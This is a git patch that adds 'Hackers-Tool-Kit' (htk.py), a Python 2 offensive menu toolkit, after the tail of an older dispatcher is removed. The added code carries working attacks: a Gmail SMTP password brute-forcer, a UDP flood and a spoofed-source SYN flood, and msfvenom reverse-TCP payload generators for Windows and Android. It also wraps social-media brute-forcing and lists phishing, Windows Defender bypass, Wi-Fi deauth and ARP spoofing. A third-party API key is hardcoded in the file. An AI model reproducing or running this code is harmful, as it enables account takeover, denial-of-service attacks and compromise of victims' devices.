"clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - found = True -mainbanner() -main() From 029b70ea3605e6f2c2538157fe1c40052f109426 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 11:48:57 -0500 Subject: [PATCH 083/214] Add files via upload --- htk.py | 2483 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2483 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..df7b69f --- /dev/null +++ b/htk.py @@ -0,0 +1,2483 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + 